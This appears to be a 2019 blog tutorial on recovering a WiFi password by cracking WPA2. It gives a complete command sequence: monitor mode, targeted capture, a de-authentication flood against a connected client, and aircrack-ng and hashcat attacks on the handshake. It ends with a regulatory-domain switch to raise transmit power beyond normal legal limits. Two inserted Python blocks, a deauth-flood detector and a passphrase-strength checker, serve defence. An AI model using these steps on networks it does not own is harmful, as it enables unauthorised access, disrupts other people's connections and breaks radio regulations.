I forgot my WIFI password

Tomas Savenas
3 min read, Feb 5, 2019


Oh, it’s no longer a problem…

I want to show how I recovered my WIFI password. The essential tool in wireless security testing is the wireless adapter. It must support monitor mode and packet injection into a wireless stream. Standard adapters usually support monitor mode, so you will be able to run the airodump-ng command and listen to the wireless traffic around you, but injection support is required to run the aireplay-ng command. A list of supported adapters is here [1].

I used only these tools below:

  • Laptop with GPU
  • Alfa AWUS036AC adapter
  • Latest Kali Linux

My virtual machine with Kali Linux [2] is ready. I need to make sure my WIFI adapter is attached to the virtual machine.

On the VirtualBox toolbar:

Settings > Ports > USB > + > USB Realtek adapter

Once the operating system has loaded, I log in with the default user root and password toor. In a new terminal window I check for available WIFI devices:

iwconfig

I see a device named wlan0.

# Optional: upgrading the packages is not required.
sudo apt update && sudo apt upgrade -y

By default, the latest Kali has Hashcat, Aircrack-ng and other tools preinstalled, but it is also possible to use these tools on Ubuntu or another distro.

# Optional: only needed if the OS is not Kali
sudo apt install hashcat aircrack-ng -y

My Alfa adapter is capable of sniffing and injecting packets. I need to switch the adapter into monitor mode. Usually a WIFI adapter is recognized as wlan0, and once it is in monitor mode it becomes wlan0mon.

airmon-ng check kill && airmon-ng start wlan0

I have to scan the wireless network area and get more technical details about my access point.

airodump-ng wlan0mon

From the output, I see the WIFI signal is strong, the packet count is increasing, and the channel number is 5. My goal is to catch only my own handshake, so I specify the channel and BSSID and start capturing packets into a file.

airodump-ng wlan0mon --channel 5 --bssid 55:CC:BB:11:LT:12 --write mywifi --force

It is essential to have at least one device connected to the access point. During the full handshake the key material is exchanged between the client and the access point, and forcing the client to reconnect with a de-authentication makes that handshake happen again. In a new terminal, I ran the command with additional arguments for the access point, the client and the number of de-authentication packets.

aireplay-ng wlan0mon -a 55:CC:BB:11:LT:12 -c 55:44:44:68:73:65 -0 99

I am waiting for the message WPA handshake: 00:11:22:33:44:55 in the top right-hand corner of the airodump-ng terminal. After a few moments, it appears on my screen.
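The burst of de-authentication frames used above is also the easiest part of this procedure to spot from the defender's side. The following is an added example, not code from the original post: a small detector that flags a deauth flood from a list of 802.11 management-frame records. The record format and the sample frames are constructed for the example; in practice the frames would come from a wireless IDS or a monitor-mode capture decoded by another tool.

```python
# Added example (not from the original post): flag a deauthentication flood
# against one client from a list of decoded 802.11 management-frame records.
# Frame records and MAC addresses below are constructed placeholders.
from collections import defaultdict, deque

# 802.11 management-frame subtypes (frame type 0)
SUBTYPE_BEACON = 8
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12


def detect_deauth_flood(frames, window_s=1.0, threshold=10):
    """Return one alert per (bssid, client) pair that receives more than
    `threshold` deauth/disassoc frames inside any sliding window of
    `window_s` seconds. Each frame is a dict with keys:
    t (seconds, float), subtype (int), bssid (str), dst (str)."""
    recent = defaultdict(deque)  # (bssid, dst) -> timestamps inside the window
    alerted = set()
    alerts = []
    for f in sorted(frames, key=lambda x: x["t"]):
        if f["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        key = (f["bssid"], f["dst"])
        q = recent[key]
        q.append(f["t"])
        # drop timestamps that fell out of the sliding window
        while q and f["t"] - q[0] > window_s:
            q.popleft()
        if len(q) > threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"bssid": key[0], "client": key[1],
                           "count": len(q), "first": q[0], "last": q[-1]})
    return alerts


# Constructed sample: beacons, one legitimate deauth, then a burst of 20
# deauth frames to a single client within 0.4 s (what a "-0" flood looks like).
AP = "00:11:22:33:44:55"      # placeholder BSSID
CLIENT = "aa:bb:cc:dd:ee:01"  # placeholder client MAC
SAMPLE_FRAMES = (
    [{"t": i * 0.1, "subtype": SUBTYPE_BEACON, "bssid": AP, "dst": "ff:ff:ff:ff:ff:ff"}
     for i in range(5)]
    + [{"t": 0.3, "subtype": SUBTYPE_DEAUTH, "bssid": AP, "dst": CLIENT}]
    + [{"t": 5.0 + i * 0.02, "subtype": SUBTYPE_DEAUTH, "bssid": AP, "dst": CLIENT}
       for i in range(20)]
)

if __name__ == "__main__":
    for a in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"deauth flood: {a['count']} frames to {a['client']} from {a['bssid']} "
              f"between t={a['first']:.2f}s and t={a['last']:.2f}s")
```

The single deauth at t=0.3 s is left alone; only the burst crosses the threshold, and the alert fires once per client rather than once per frame, so a 99-packet flood produces one event instead of 89.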

I have two options:

Option 1: I can use a list of the most common passwords, that is, aircrack-ng with a dictionary attack.

aircrack-ng -a 2 -b 55:CC:BB:11:LT:12 -w wordlist.txt mywifi-01.cap

Option 2: I can convert the capture to hashcat's format and run a mask attack on the GPU.

# Convert the capture to hashcat's hccapx format
aircrack-ng -j hashcat mywifi-01.cap
# And it's time for hashcat :)
sudo hashcat -m 2500 -a 3 hashcat.hccapx ?d?d?d?d?d?d?d?d --potfile-path wpa2.pot

The result (hash, SSID name and my password) is printed in the terminal and saved to the file wpa2.pot.
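The mask ?d?d?d?d?d?d?d?d covers only 10^8 candidates, which is why an all-digit passphrase falls in minutes on a laptop GPU. As an added example (not part of the original post), the code below computes the keyspace of a hashcat mask, the worst-case time to exhaust it at an assumed hash rate, and a few checks a defender can run against their own WPA2 passphrase before an attacker does. The charset sizes are hashcat's built-in mask symbols; the hash rate and the thresholds are assumptions, not measurements.

```python
# Added example (not from the original post): size up a hashcat mask attack
# and check a WPA2-PSK against it. Hash rate and thresholds are assumed values.
import math
import re

# hashcat built-in charsets: ?l lower, ?u upper, ?d digits, ?s specials, ?a all printable
CHARSET_SIZE = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95}


def mask_keyspace(mask):
    """Number of candidates a hashcat mask such as '?d?d?d?d?d?d?d?d' covers.
    Literal characters (and '??', a literal '?') count as one fixed choice."""
    total = 1
    i = 0
    while i < len(mask):
        if mask[i] != "?":
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' in mask")
        sym = mask[i + 1]
        if sym != "?":
            if sym not in CHARSET_SIZE:
                raise ValueError(f"unknown charset ?{sym}")
            total *= CHARSET_SIZE[sym]
        i += 2
    return total


def seconds_to_exhaust(mask, hashes_per_second):
    """Worst-case time to try every candidate of `mask` at the given rate."""
    return mask_keyspace(mask) / hashes_per_second


def estimated_bits(psk):
    """Rough brute-force entropy: log2(charset^length), where the charset is the
    union of the character classes actually used in the passphrase."""
    size = 0
    if re.search(r"[a-z]", psk):
        size += CHARSET_SIZE["l"]
    if re.search(r"[A-Z]", psk):
        size += CHARSET_SIZE["u"]
    if re.search(r"[0-9]", psk):
        size += CHARSET_SIZE["d"]
    if re.search(r"[^a-zA-Z0-9]", psk):
        size += CHARSET_SIZE["s"]
    return len(psk) * math.log2(size) if size else 0.0


def psk_findings(psk, min_bits=40):
    """List the reasons a WPA2-PSK is weak against the attacks on this page.
    An empty list means none of the checks fired."""
    findings = []
    if not 8 <= len(psk) <= 63:
        findings.append("WPA2 passphrases must be 8 to 63 characters")
    if re.fullmatch(r"[0-9]{8}", psk):
        findings.append("matches the ?d?d?d?d?d?d?d?d mask (10^8 candidates)")
    elif psk.isdigit():
        findings.append("digits only: keyspace is 10^length, far below a mixed charset")
    if estimated_bits(psk) < min_bits:
        findings.append(f"estimated brute-force entropy below {min_bits} bits")
    return findings


if __name__ == "__main__":
    ASSUMED_RATE = 400_000  # hashes/s, an assumed figure for a laptop GPU on mode 2500
    mask = "?d?d?d?d?d?d?d?d"
    print(f"{mask}: {mask_keyspace(mask):,} candidates, "
          f"{seconds_to_exhaust(mask, ASSUMED_RATE):.0f} s worst case at {ASSUMED_RATE:,} H/s")
    for candidate in ("12345678", "correct horse battery staple"):
        print(f"{candidate!r}: {estimated_bits(candidate):.1f} bits, {psk_findings(candidate)}")
```

The point of estimated_bits is the comparison, not the absolute number: an eight-digit PSK sits near 27 bits, while a four-word passphrase is far beyond anything a mask or wordlist attack on a single GPU will reach, so the practical defence is length and a non-numeric charset, not a cleverer router.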

One more thing: with this configuration you will need to increase the TX power up to 1 W.

Tested on an AWUS036H.

ifconfig wlan0 down
# switch the regulatory domain; GY permits a higher TX power limit than the default
iw reg set GY
ifconfig wlan0 up
ifconfig wlan0

References

[1] https://null-byte.wonderhowto.com/how-to/check-if-your-wireless-network-adapter-supports-monitor-mode-packet-injection-0191221/
[2] https://medium.com/@tomas_savenas/kali-2018-4-and-metasploit-framework-5-0-73190afc9d96


Tomas Savenas

Cyber security enthusiast; the most active Lithuanian on the TryHackMe platform; Master's student in Innovation Management and Entrepreneurship @ KTU